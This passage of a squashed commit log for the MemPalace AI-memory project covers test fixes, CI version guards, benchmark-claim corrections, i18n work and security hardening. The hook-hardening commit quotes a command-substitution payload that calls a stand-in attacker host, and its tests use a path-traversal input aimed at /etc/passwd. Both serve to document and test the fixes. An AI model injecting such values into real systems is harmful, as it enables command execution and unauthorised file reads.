``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires. * ``test_stale_fact_detected`` — valid_to-closed triple is flagged. * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match. * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup. * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine. * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support. 785/785 suite pass. ruff + format clean on CI-pinned 0.4.x. * Optimize entity detection with regex caching and pre-compilation - Use functools.lru_cache to cache compiled patterns for entity names. - Pre-compile static pronoun patterns into a single regex. - Remove redundant .lower() calls in score_entity loop. Co-authored-by: igorls <[email protected]> * docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787) Follow-up to #766 which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs: - website/ (VitePress config + 6 docs pages) - .claude-plugin/ (plugin.json repository, README marketplace command) - .codex-plugin/ (plugin.json URLs, README links) Author name fields are intentionally unchanged. * test: make diary state path assertion platform-neutral The Windows CI job failed on: assert '/.mempalace/state/' in str(state_path) because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS. * test: serialize mine_lock concurrency test with multiprocessing The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract. ``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it: 1. reflects the actual use case (one lock per mining process); 2. passes on all three OSes without flock-semantics branching; 3. catches real regressions (a broken lock would now let both processes through, exactly what we care about). Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows. * test: verify mine_lock via disjoint critical-section intervals The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn. Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back. * Fix: ruff format with CI-pinned version (0.4.x) * fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835) * fix: README audit — match every claim to shipped code + add hall detection TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures: 1. Tool count: 19 → 29 (10 tools were undocumented) 2. Added tool table rows for tunnels, drawer management, system tools 3. Version badge: 3.1.0 → 3.2.0 4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers" 5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py) 6. pyproject.toml version in project structure: v3.0.0 → v3.2.0 7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections New code: - miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata - tests/test_hall_detection.py — 12 TDD tests (written before code) - tests/test_readme_claims.py — 42 TDD tests verifying README accuracy 859/859 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: resolve ruff lint — unused imports and variables Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * style: ruff format with CI-pinned 0.4.x Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use conftest fixtures in hall tests for Windows compat Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory. Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: address Igor's review — convo_miner halls, cached config, markdown typo TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes. 1. README markdown typo: extra ** in wake-up token row (line 195) 2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it) 3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine 4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching 861/861 tests pass. ruff clean. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> --------- Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * fix(website): update vitepress base url for custom domain * chore(release): bump version strings to 3.3.0 and curate CHANGELOG Prepare develop for the 3.3.0 release cycle. Version bumps: - mempalace/version.py: 3.2.0 -> 3.3.0 - pyproject.toml: 3.2.0 -> 3.3.0 - README.md: pyproject.toml label and shields.io badge - uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras) CHANGELOG.md: - Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made) - Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc. - Adopt Keep a Changelog + SemVer framing - Add version compare reference links at the bottom - Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace --------- Co-authored-by: MSL <[email protected]> Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> Co-authored-by: eblander <[email protected]> Co-authored-by: shafdev <[email protected]> Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: mvalentsev <[email protected]> Co-authored-by: Dominique Deschatre <[email protected]> * ci: serve docs from develop only Docs deploy to GitHub Pages from develop for faster iteration cycles. Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway. Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works. * fix(status): paginate metadata fetch to support large palaces `col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850). Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct. Tested on a 122,686-drawer palace. Fixes #850 Related: #802, #723 * refactor: route all chromadb access through ChromaBackend Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules. * fix: update stale org URLs in pyproject.toml and README (#787) * fix: harden hooks against shell injection, path traversal, and arithmetic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809 * fix: add logging on rejected transcript paths and platform-native path test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace/mempalace#809 * Increase visibility of fake website caution Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README. * fix: use permissive validator for KG entity values (closes #455) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names. * chore: bump plugin manifests to 3.3.0 and fix owner URL Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps. Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org. Refs #874 * ci: add version guard to catch tag/manifest drift Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json). Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users. Refs #874 * ci: let semver pre-release tags bypass strict manifest match Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch. Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact. The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves. * fix: ship CNAME in Pages artifact to pin custom domain Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source. Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it. * docs: tighten SECURITY.md with real version policy and GHPVR-only channel Builds on @Yorji-Porji's draft by fixing three issues before it lands: - Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not. - Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address. - Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text. Structure, triage timelines, and credit language are kept as drafted. * fix: allow mining directories without local mempalace.yaml When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14. * fix: remove unused sys import * fix: send missing-yaml warning to stderr and flag basename collisions Addresses review feedback on #604: - Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere. - Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml. * docs: name official domain and specific impostors in scam alert Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other. * perf: optimize regex compilation in entity extraction Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <[email protected]> * feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871) export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat export MEMPAL_VERBOSE=false → silent background save (default) Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work. TDD: tests written first, failed, code fixed, tests pass. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * feat: add VSCode devcontainer matching CI environment Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x. * fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph * fix: replace invalid 'decision: allow' with {} in hooks Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: add missing self._lock to KnowledgeGraph.close() TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes #883. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * benchmarks: add --llm-backend ollama for non-Anthropic rerank The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency. Both longmemeval_bench.py and locomo_bench.py: - llm_rerank*() gain backend= / base_url= kwargs - CLI: --llm-backend {anthropic,ollama}, --llm-base-url - API key required only when backend=anthropic (diary/palace modes still require it) - Parse last integer in response (reasoning models emit multi-int output) - Fallback to message.reasoning when content is empty - Raise max_tokens to 1024 for reasoning models * benchmarks: apply ruff-format to llm_rerank (trivial line wrap) * benchmarks: add v3.3.0 reproduction results + 50/450 split Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split). Scorecard — all reproduce exactly: LongMemEval raw R@5 96.6% (500/500) ✅ hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅ hybrid_v4 + minimax rerank R@5 99.2% (496/500) * hybrid_v4 + minimax rerank R@10 100.0% (500/500) * LoCoMo (session, top-10) raw 60.3% (1986q) ✅ hybrid v5 88.9% (1986q) ✅ ConvoMem all-categories (250 items) 92.9% ✅ MemBench all-categories (8500) 80.3% ✅ * The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test. The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end. * docs: slim README and move corrections/notices to docs/HISTORY.md Addresses #875. The previous README was 755 lines mixing six purposes (scam alert, hero, two mea-culpa notes, install guide, architecture explainer, API reference, file map). Rework it as a pure entry point: what MemPalace is, how to install, honest benchmark numbers, links to the website for concept/architecture documentation. Key content changes: - Drop the "highest-scoring AI memory system ever benchmarked" framing. - New tagline: "Local-first AI memory. Verbatim storage, pluggable backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids naming a specific vector-store implementation since the backend is pluggable (see mempalace/backends/base.py). - Remove the cross-system comparison table. Retrieval recall (R@5) and end-to-end QA accuracy are different metrics and are not comparable; placing MemPalace's R@5 next to competitor QA accuracy under a single column header was a category error. - The "100%" LongMemEval headline is no longer the lead. The honest held-out figure is 98.4% R@5 on 450 unseen questions. The rerank pipeline reaches >=99% with any capable LLM (reproduced with Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level, not model-specific. - Benchmark reproduction commands now reference the correct repo (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch). New file: docs/HISTORY.md as the canonical home for post-launch corrections, public notices, and retractions. Contains verbatim: - 2026-04-14 note on this rewrite (links to #875) - 2026-04-11 impostor-domain notice (moved from README header) - 2026-04-07 "A Note from Milla & Ben" (moved from README body) README keeps a one-line scam-alert callout that links to docs/HISTORY.md for the full timeline. * docs(website): align mempalaceofficial.com with honest benchmarks Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit. website/index.md - New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls). - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics). - Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable. website/reference/benchmarks.md - Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific. - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval. - Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions. - Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag. website/concepts/the-palace.md - Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained. website/guide/searching.md - Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost. website/reference/contributing.md - Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic. website/concepts/knowledge-graph.md - Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source. * docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits. CONTRIBUTING.md - "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents). benchmarks/BENCHMARKS.md - Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall. - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%. - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`. benchmarks/README.md + benchmarks/HYBRID_MODE.md - Same clone-URL fix applied. CHANGELOG.md - Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite. * docs+tests: fix CI after README slim (#875) The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing: TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict TestNoUnlistedTools.test_no_undocumented_tools TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless Changes in this commit: 1. Update the 3 tests to track the new canonical docs surfaces - Tool list -> website/reference/mcp-tools.md (tests parse `### \`mempalace_xxx\`` headings instead of markdown table rows). - dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless"). 2. Fix the website to make "no undocumented tools" true Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools". 3. Align pre-commit ruff pin to match CI (0.4.x) .pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step. Full suite: 887 passed, 0 failed. * fix: address i18n review issues from PR #718 Three issues flagged by bensig on the i18n PR before merge: 1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}. 2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md. 3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls. Added two regression tests for the ko.json fix and the state leak. * docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862) Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first. * fix: make entity_registry.research() local-only by default (#811) * fix: make entity_registry.research() local-only by default research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md. Changes: - research() now returns "unknown" for uncached words by default - New allow_network=True parameter required for Wikipedia lookups - Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning - Added privacy warning docstring to _wikipedia_lookup() - Added tests for local-only default, opt-in network, 404 handling, and cache-not-persisted-on-local-only behaviour Refs: MemPalace/mempalace#809 * fix: improve research() cache read path and deduplicate test mocks - Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily - Move .setdefault() to the network-write path only - Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths - Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions * fix: return empty status instead of error on cold-start palace (#830) (#831) tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers). The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does. Fix suggested by @hkevinchu in the issue. * fix(searcher): guard against empty ChromaDB query results (#195) (#865) Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape: {"documents": [], "metadatas": [], "distances": []} Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response. Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw(). Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard. Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists. * fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866) Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report. This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block. The helper is conservative: - only runs when <dir>/.git is present (no-op for non-git projects) - skips entries already present (no duplicates) - preserves existing .gitignore content - handles files without trailing newlines This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow. Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case. * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864) * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like: MCP mempalace: Unexpected token '*', "**********"... is not valid JSON MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0. Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout. Adds tests/test_mcp_stdio_protection.py with three regression tests: - module-level redirect is in place after import - _restore_stdout() restores the original stdout (idempotent) - 'python -m mempalace.mcp_server' with empty stdin emits no stdout * style: reformat with ruff 0.4 (CI version) for #225 * fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863) * fix(hooks): stop precompact hook from blocking compaction The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users. Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow. Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR. Stop hook behavior is unchanged -- left for #673 which implements the full silent save path. Closes #856, closes #858. * fix: use empty JSON instead of invalid \"allow\" decision value Claude Code only recognizes \"block\" as a top-level decision value. \"allow\" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON. Caught by #872. * feat: include created_at timestamp in search results (#846) * feat: include created_at timestamp in search results (closes #465) Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries. * Feat: add fallback for missing filed_at metadata * fix: add provenance header and speaker IDs to Slack transcript imports (#815) * fix: add provenance header and speaker IDs to Slack transcript imports Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant". The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory). Changes: - Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment - Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors - Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py Tests: - Provenance header presence and content - Speaker ID preservation in output - Attacker-first-message attribution verification Refs: MemPalace/mempalace#809 * fix: move Slack provenance to footer, sanitize speaker IDs, extract constant - Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates verbatim-always principle) - Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports - Extract header string to _SLACK_PROVENANCE_FOOTER module constant, consistent with _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal Refs: MemPalace/mempalace#809 * fix: restrict file permissions on sensitive palace data (#814) * fix: restrict file permissions on sensitive palace data On Linux with default umask (022), several files and directories containing personal data were created world-readable. This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility. Files hardened: - hooks_cli.py: hook_state/ directory and hook.log - entity_registry.py: entity_registry.json (names, relationships) - knowledge_graph.py: knowledge_graph.sqlite3 parent directory - exporter.py: export output directory and wing subdirectories - config.py: people_map.json (name mappings) - mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix) Refs: MemPalace/mempalace#809 * fix: avoid redundant chmod calls on hot paths - hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event) - exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches - mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically Refs: MemPalace/mempalace#809 * test: add palace_graph tunnel helper coverage Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered: - `_load_tunnels` - `_save_tunnels` - `create_tunnel` - `list_tunnels` - `delete_tunnel` - `follow_tunnels` * refactor(entity_detector): make multi-language extensible via i18n JSON Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged. Also adds: - get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales - MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated) - mempalace init --lang en,pt-br flag (persists to config.json) - Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default - _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship. * test: document orphan-locale recovery for _temp_locale helper * feat: add Russian language support to i18n module Add 